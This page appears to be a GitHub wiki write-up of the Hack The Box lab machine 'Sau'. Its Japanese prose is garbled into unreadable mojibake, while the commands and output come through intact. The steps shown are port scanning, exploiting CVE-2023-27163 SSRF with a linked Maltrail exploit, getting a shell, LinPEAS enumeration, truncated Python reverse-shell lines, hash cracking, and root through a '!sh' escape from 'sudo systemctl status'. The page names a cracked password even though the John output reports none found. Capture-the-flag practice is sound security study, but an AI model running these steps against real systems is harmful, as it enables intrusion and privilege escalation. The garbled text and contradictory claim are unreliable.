HTB_Sau - meruneru/tech_memo GitHub Wiki

Machine - Sau

ใ€€ใ€€

port scan

22,55555ใ ใ‘ใŒ้–‹ใ„ใฆใ„ใ‚‹ใ‹ใจๆ€ใ„ใใ‚„ใ€ UDPใง68ใŒ้–‹ใ„ใฆใ„ใ‚‹ใ€‚ 68ใฏDHCPใจใฎใ“ใจใ€‚

โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/htb/sau]
โ””โ”€$ sudo nmap  -Pn -p- --min-rate 5000 -oN nmap.txt sau.htb     
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2023-08-12 03:34 EDT
Warning: 10.10.11.224 giving up on port because retransmission cap hit (10).
Nmap scan report for sau.htb (10.10.11.224)
Host is up (0.30s latency).
Not shown: 65530 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    filtered http
7987/tcp  filtered unknown
8338/tcp  filtered unknown
55555/tcp open     unknown

Nmap done: 1 IP address (1 host up) scanned in 25.37 seconds
                                                                   

$ sudo nmap -sU -top-ports 50 sau.htb
PORT   STATE         SERVICE
68/udp open|filtered dhcpc

Access

http://sau.htb:55555 ใซใ‚ขใ‚ฏใ‚ปใ‚นใ™ใ‚‹ใจใ€request-basktets ver.1.2.1ใŒๅ‹•ไฝœใ—ใฆใ„ใ‚‹ใ€‚

SSRFใŒใงใใ‚‹ใฟใŸใ„ใ€‚ https://nvd.nist.gov/vuln/detail/CVE-2023-27163 https://github.com/HusenjanDev/CVE-2023-27163-AND-Mailtrail-v0.53

ไธŠ่จ˜ใงใ‚ทใ‚งใƒซใŒๅ–ใ‚ŒใŸใ€‚

$ id
id
uid=1001(puma) gid=1001(puma) groups=1001(puma)

$ env
env
USER=puma
HOME=/home/puma
LOGNAME=puma
JOURNAL_STREAM=9:21758
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
INVOCATION_ID=cbbaaf8aa2c84ee382f8a44d1e48c02e
LANG=C.UTF-8
SHELL=/bin/bash
PWD=/opt/maltrail

$ cat /home/puma/user.txt

ไฝฟใ„ใ‚„ใ™ใ„ใ‚ทใ‚งใƒซ

python3 -c'import pty;pty.spawn("/bin/bash")'

็ฎก็†่€…ๆจฉ้™ใ‚’ๅ–ๅพ—

LinPEAS

ๆจฉ้™ๆ˜‡ๆ ผใฎใŸใ‚ใฎๆƒ…ๅ ฑใ‚’ๅŽ้›†ใ™ใ‚‹ #LinPEAS github ใ‚’ๅฎŸ่กŒใ™ใ‚‹ใ€‚

โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฃ Active Ports
โ•š https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp        0      0 0.0.0.0:8338            0.0.0.0:*               LISTEN      897/python3
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp6       0      0 :::55555                :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -                                                                                                                                 
โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฃ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d 
โ•š https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid                              
Matching Defaults entries for puma on sau:      
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User puma may run the following commands on sau:                                                                                                                                                                  
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service   

maltrail ใŒๅ‹•ใ„ใฆใ„ใฆใ€้ŽๅŽปใซๅฎŸ่กŒใ—ใŸใ‚ณใƒžใƒณใƒ‰ใŒ่จ˜้Œฒใ•ใ‚Œใฆใ„ใ‚‹ใ“ใจใŒใ‚ใ‹ใ‚‹ใ€‚

$ /usr/bin/systemctl status trail.service 
โ— trail.service - Maltrail. Server of malicious traffic detection system        
     Loaded: loaded (/etc/systemd/system/trail.service; enabled; vendor preset: enabled)
     Active: active (running) since Sat 2023-08-12 01:33:34 UTC; 7h ago         
       Docs: https://github.com/stamparm/maltrail#readme                        
             https://github.com/stamparm/maltrail/wiki                          
   Main PID: 897 (python3)                                                                               
      Tasks: 49 (limit: 4662)                                                                            
     Memory: 358.6M                                                                                      
     CGroup: /system.slice/trail.service                                                                 
             โ”œโ”€  897 /usr/bin/python3 server.py                                                                                                                                                                   
             โ”œโ”€ 1151 /bin/sh -c logger -p auth.info -t "maltrail[897]" "Failed โ€ฆ
             โ”œโ”€ 1153 /bin/sh -c logger -p auth.info -t "maltrail[897]" "Failed โ€ฆ
             โ”œโ”€ 1160 sh
             โ”œโ”€ 1161 python3 -c import socket,os,pty;s=socket.socket(socket.AF_โ€ฆ
             โ”œโ”€ 1162 /bin/sh
             โ”œโ”€ 1163 /bin/bash
             โ”œโ”€ 1194 /bin/sh -c logger -p auth.info -t "maltrail[897]" "Failed โ€ฆ
             โ”œโ”€ 1195 /bin/sh -c logger -p auth.info -t "maltrail[897]" "Failed โ€ฆ
             โ”œโ”€ 1198 sh
             โ”œโ”€ 1199 python3 -c import socket,os,pty;s=socket.socket(socket.AF_โ€ฆ
             โ”œโ”€ 1200 /bin/sh
...

SSHใƒใƒผใƒˆใƒ•ใ‚ฉใƒฏใƒผใƒ‰ใ—ใŸใ„ใŒใƒปใƒปใƒป

ใ‚ตใƒผใƒๅ†…ๅ‘ใ‘ใซใƒใƒผใƒˆ8338ใงmaltrailใŒๅ‹•ใ„ใฆใ„ใ‚‹ใ€‚

ใƒใƒผใƒˆใƒ•ใ‚ฉใƒฏใƒผใƒ‰ใ—ใŸใ„ใจใ“ใ‚ใ ใŒใ€pumaใ‚ขใ‚ซใ‚ฆใƒณใƒˆใฎใƒ‘ใ‚นใƒฏใƒผใƒ‰ใŒๅˆ†ใ‹ใ‚‰ใšใ€SSHใŒๅผตใ‚Œใชใ„ใ€‚

/opt/maltrailใซใ‚ใ‚‹maltrail.confใƒ•ใ‚กใ‚คใƒซใ‚’่ฆ‹ใฆใ„ใ‚‹ใจไธ‹่จ˜่จ˜่ฟฐใŒใ‚ใฃใŸใ€‚

# User entries (username:sha256(password):UID:filter_netmask(s))
# Note(s): sha256(password) can be generated on Linux with: echo -n 'password' | sha256sum | cut -d " " -f 1
#          UID >= 1000 have only rights to display results (Note: this moment only functionality implemented at the client side)
#          filter_netmask(s) is/are used to filter results

USERS                                            
    admin:9ab3cd9d67bf49d01f6a2e33d0bd9bc804ddbe6ce1ff5d219c42624851db5dbc:0:                        # changeme!
    

john the ripperใง่งฃๆžใ™ใ‚‹ใ€‚

โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/htb/sau]
โ””โ”€$ john admin_hash.txt --wordlist=~/SecLists/Passwords/Leaked-Databases/rockyou-75.txt  --format=Raw-SHA256
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2023-08-12 04:58) 0g/s 2959Kp/s 2959Kc/s 2959KC/s beautygirl..171183
Session completed

admin/beautygirl ใจใ„ใ†ใ“ใจใ‚‰ใ—ใ„ใŒใƒปใƒปใƒปใ€‚

ๅคงใใชๅ‹˜้•ใ„

sudoใ‚’ใคใ‘ใฆๅฎŸ่กŒใ™ใ‚‹ๅฟ…่ฆใŒใ‚ใฃใŸใ€‚ ใ‚ใจใฏใ€shใ‚’ๅฎŸ่กŒใ™ใ‚Œใฐrootๆจฉ้™ใŒๅ–ใ‚ŒใŸใ€‚

puma@sau:~$ sudo /usr/bin/systemctl status trail.service
!sh
โš ๏ธ **GitHub.com Fallback** โš ๏ธ